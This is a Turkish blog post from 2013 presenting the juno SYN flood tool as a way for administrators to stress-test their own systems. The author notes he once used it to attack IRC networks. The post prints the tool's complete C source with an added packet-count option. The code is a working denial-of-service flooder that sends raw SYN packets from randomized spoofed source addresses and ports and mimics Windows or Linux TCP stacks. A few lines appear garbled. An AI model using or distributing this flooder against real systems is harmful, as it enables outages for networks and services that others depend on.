SYN Flood Testleri
June 23, 2013 Leave a Comment
Bu aralar DoS/DDoS saldirilari cok ayaga dustu malum, o sebeple bir cok yonetici kendi sistemlerinin bu tip saldirilara karsi ne kadar dayanikli oldugunu test etmek istiyor.
Layer7/uygulama katmaninda yapilan flood saldirilari spoofed ip’lerle yapilamayacagi icin genellikle botnet’lerle gerceklestirilse de, hala en yaygin saldirilarin basinda SYN Flood saldirilari var. Cunku ;
1. uygulamasi cok kolay
2. etkisi yuksek.
Yillardir tabi bunun icin syncookie enable, tcp timeout suresini dusurme gibi bir cok optimizasyon yolu mevcut lakin PPS yukseldikce bildiginiz gibi ag girisindeki sistemler hatta bazen(cogunlukla) uygun olmayan veya duzgun ayarlanmamis IPS ve Firewall sistemleri servis veremez duruma geliyor, beraberinde de agin tamamini erisilmez kiliyor.
SYN Flood saldirilarinda juno araci cok yaygin sekilde kullanilir. Hatta ben kendimi bildim bileli, henuz 2000 olmamisken dahi iRC network’lerine saldirmak icin bol bol kullandigimiz bir aracti 🙂
Simdi bunu kullanip kendi sistemlerini test etmek isteyen sistem yoneticileri, normal sekilde juno’yu kurduklarinda olculebilir bir test yapamazlar zira siz durdurana kadar calismaya devam eder. Istediginiz sayida paket gonderilmesi icin ben de opsiyonel bir parametre ekledim, boylelikle legal kullanima ve sistemleri test etmeye daha yatkin hale geldi. Hazir el atmisken ciktilarinda da biraz makyaj yaptim.
Syntax: ./juno <target ip> <target port> [packet count (optional)]
packet count icin bir deger vermezseniz yine eski usul siz kesene kadar calisiyor.
Source su sekilde :
char about[] = "juno.c by Sorcerer of DALnet\n"; /* for best results, compile with: gcc -O2 juno.c -o juno thanks to bleach for releasing this for me, I'm too lazy to do it myself P.S I'd just like to send out a big "get out of the closet" to malkman, for making useless mods to this source that actually make it *less* effective. Get a life man. */ #include <stdio.h> #include <netinet/in.h> #include <netdb.h> #include <sys/time.h> #include <sys/types.h> #include <unistd.h> #include <stdlib.h> #include <signal.h> #include <locale.h> #define USELESS_INFO #define EMULATE_WINDOWS /* EMULATE_WINDOWS or EMULATE_LINUX */ #define RANDOMIZE_SOURCE_IP /* random source ips */ #define RANDOMIZE_SOURCE_PORT /* random source ports */ #undef DELAY/* 1000 microsecond delay, undef for none */ /* nothing beyond here is useful to people who can't program */ #ifndef EMULATE_WINDOWS # ifndef EMULATE_LINUX # define EMULATE_WINDOWS 1 # endif #endif struct syn { unsigned char verihl; unsigned char tos; unsigned short len; unsigned short id; unsigned short flg_ofs; unsigned char ttl; unsigned char proto; unsigned short ipsum; unsigned long src; unsigned long dst; unsigned short sport; unsigned short dport; unsigned long seq; unsigned long ack_seq; unsigned char offset; unsigned char flags; unsigned short win; unsigned short tcpsum; unsigned short urgptr; #ifdef EMULATE_WINDOWS char opt[8]; #else # ifdef EMULATE_LINUX char opt[20]; # endif #endif }; int resolve(char *name,unsigned long *ip) { struct hostent *host; if ((*ip=inet_addr(name)) == INADDR_NONE) { if (!(host=gethostbyname(name))) return(-1); *ip=((struct in_addr *)host->h_addr)->s_addr; } return(0); } int getsock(void) { int s = socket(PF_INET,SOCK_RAW,6),one=1; if(s<1) return(0); if(setsockopt(s,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one))<0) return(0); return(s); } int getport(char *s, unsigned short *out) { char const *p; int n; if(!*s) return(-1); for (p=s;*p;p++) if(*p<'0'||*p>'9') return(-2); if(p-s>5) return(-3); if(((n=atoi(s))>65535) || (n<0)) return(4); *out=htons(n); return(0); } void prep_syn(struct syn *syn) { syn->verihl = 69; syn->len = htons(sizeof(struct syn)); syn->flg_ofs = 64; syn->proto = 6; syn->flags = 2; #ifdef EMULATE_WINDOWS syn->ttl = 128; syn->offset = 112; syn->win = htons(8192); syn->opt[0] = 2; syn->opt[1] = 4; syn->opt[2] = 5; syn->opt[3] = 0xB4; syn->opt[4] = 1; syn->opt[5] = 1; syn->opt[6] = 4; syn->opt[7] = 2; #else # ifdef EMULATE_LINUX syn->tos = 16; syn->ttl = 64; syn->offset = 160; syn->win = htons(15536); syn->opt[0] = 0x02; syn->opt[1] = 0x04; syn->opt[2] = 0x0F; syn->opt[3] = 0x2C; syn->opt[4] = 0x04; syn->opt[5] = 0x02; syn->opt[6] = 0x08; syn->opt[7] = 0x0A; syn->opt[9] = 0x05; syn->opt[10] = 0x27; syn->opt[11] = 0x2D; syn->opt[13] = 0x05; syn->opt[14] = 0x27; syn->opt[15] = 0x2D; syn->opt[16] = 0x01; syn->opt[17] = 0x03; syn->opt[18] = 0x03; # endif #endif } int starttime,outcount=0; int xmit_syn(struct syn *syn,int sock,struct sockaddr_in *targ) { register int count = (sizeof(struct syn)-20) >> 1,sum; register unsigned short *p = &syn->sport; #ifdef RANDOMIZE_SOURCE_IP syn->src = random(); #endif syn->id = 1+255*((random()%256)|0xFF); #ifdef RANDOMIZE_SOURCE_PORT syn->sport = htons(1024 + (random() & 2048)); #endif syn->seq = random(); syn->ack_seq = random(); syn->tcpsum = 0; sum = (syn->src >> 16) + (syn->src & 0xffff) + (syn->dst >> 16) + (syn->dst & 0xffff) + 1536 + htons(count << 1); while(count--) sum += *p++; sum = (sum >> 16) + (sum & 0xffff); syn->tcpsum = ~(sum += (sum >> 16)); outcount++; return(sendto(sock,syn,sizeof(struct syn),0,targ,sizeof(struct sockaddr_in))); } #ifdef RANDOMIZE_SOURCE_IP # ifdef RANDOMIZE_SOURCE_PORT # define TARGET_IP_INDEX 1 # else # define SOURCE_PORT_INDEX 1 # define TARGET_IP_INDEX 2 # endif #else # ifdef RANDOMIZE_SOURCE_PORT # define TARGET_IP_INDEX 2 # else # define SOURCE_PORT_INDEX 2 # define TARGET_IP_INDEX 3 # endif #endif void sig_proc(int signum) { int ctime=time(NULL); printf("\n -- statistics -----------------------\n"); printf(" Packets sent :\t%'d Packets\n",outcount); printf(" Bytes sent :\t%'d Bytes (%'d KBytes)\n",outcount * sizeof(struct syn), (outcount * sizeof(struct syn))/1024); printf(" Seconds active :\t%'d sec(s)\n",ctime-starttime); printf(" Average Kbps :\t%'d Kbps\n",(outcount * sizeof(struct syn))/((ctime-starttime)*1024)); printf(" Average PPS :\t%'d PPS\n",outcount/(ctime-starttime)); printf(" -------------------------------------\n"); exit(1); } long long strtollong(char *instr) { long long retval; int i; retval = 0; for (; *instr; instr++) { retval = 10*retval + (*instr - '0'); } return retval; } int main(int argc,char *argv[]) { setlocale(LC_ALL, ""); struct syn syn; struct sockaddr_in targ; int sock; int pcount=0; long long maxpacket=0; if(argv[3] > 0) { // maxpacket=strtol(argv[3],(char **)NULL, 10); maxpacket=strtollong(argv[3]); } bzero(&syn,sizeof(struct syn)); if(argc<TARGET_IP_INDEX+2) { fprintf(stderr,"Syntax: %s",argv[0]); #ifndef RANDOMIZE_SOURCE_IP fprintf(stderr,"<source ip> "); #endif #ifndef RANDOMIZE_SOURCE_PORT fprintf(stderr,"<source port> "); #endif fprintf(stderr,"<target ip> <target port> [packet count (optional)]\n"); exit(1); } if(!(sock=getsock())) { fprintf(stderr,"Failed to create socket\n"); exit(2); } #ifndef RANDOMIZE_SOURCE_IP if(resolve(argv[1],&syn.src)) { fprintf(stderr,"Invalid source ip (%s)\n",argv[1]); exit(3); } #endif #ifndef RANDOMIZE_SOURCE_PORT if(getport(argv[SOURCE_PORT_INDEX],& { fprintf(stderr,"Invalid source port (%s)\n",argv[SOURCE_PORT_INDEX]); exit(4); } #endif if(resolve(argv[TARGET_IP_INDEX],&syn.dst)) { fprintf(stderr,"Invalid target ip (%s)\n",argv[TARGET_IP_INDEX]); exit(5); } if(getport(argv[TARGET_IP_INDEX+1],&syn.dport)) { fprintf(stderr,"Invalid target port (%s)\n",argv[TARGET_IP_INDEX+1]); exit(6); } #ifdef USELESS_INFO printf("%s%s",about,"death"); # ifndef RANDOMIZE_SOURCE_IP printf(" from %s:",inet_ntoa(syn.src)); # ifndef RANDOMIZE_SOURCE_PORT printf("%d",ntohs(; # else printf("random "); # endif # else # ifndef RANDOMIZE_SOURCE_PORT printf("random:%d",ntohs(; # endif # endif printf(" to %s:%d\n",inet_ntoa(syn.dst),ntohs(syn.dport)); #endif targ.sin_addr.s_addr = syn.dst; targ.sin_port = syn.dport; targ.sin_family = AF_INET; srandom(time(NULL)); starttime = time(NULL); while(time(NULL) == starttime) usleep(1000); signal(SIGHUP,&sig_proc); signal(SIGINT,&sig_proc); signal(SIGQUIT,&sig_proc); signal(SIGILL,&sig_proc); signal(SIGABRT,&sig_proc); signal(SIGFPE,&sig_proc); // signal(SIGKILL,&sig_proc); signal(SIGSEGV,&sig_proc); signal(SIGPIPE,&sig_proc); signal(SIGALRM,&sig_proc); signal(SIGTERM,&sig_proc); signal(SIGUSR1,&sig_proc); signal(SIGUSR2,&sig_proc); signal(SIGCHLD,&sig_proc); signal(SIGCONT,&sig_proc); // signal(SIGSTOP,&sig_proc); signal(SIGTSTP,&sig_proc); signal(SIGTTIN,&sig_proc); signal(SIGTTOU,&sig_proc); prep_syn(&syn); if (maxpacket != 0) { while(pcount<=maxpacket) { if(xmit_syn(&syn,sock,&targ)!=sizeof(struct syn)) { fprintf(stderr,"failed to send packet\n"); exit(7); } else { pcount++; } #ifdef DELAY usleep(DELAY); #endif } printf("\n -- statistics -----------------------\n"); printf(" Packets sent :\t%'d Packets\n",(pcount-1)); printf(" Bytes sent :\t%'d Bytes (%'d KBytes)\n",(pcount-1) * sizeof(struct syn), ((pcount-1) * sizeof(struct syn))/1024); printf(" Seconds active :\t%'d sec(s)\n",time(NULL)-starttime); printf(" Average Kbps :\t%'d Kbps\n",((pcount-1) * sizeof(struct syn))/((time(NULL)-starttime)*1024)); printf(" Average PPS :\t%'d PPS\n",maxpacket/(time(NULL)-starttime)); printf(" Requested Packet Count:\t%'d Packets\n",maxpacket); printf(" -------------------------------------\n"); exit(1); } else { while(1) { if(xmit_syn(&syn,sock,&targ)!=sizeof(struct syn)) { fprintf(stderr,"failed to send packet\n"); exit(7); } else { pcount++; } #ifdef DELAY usleep(DELAY); #endif } } }
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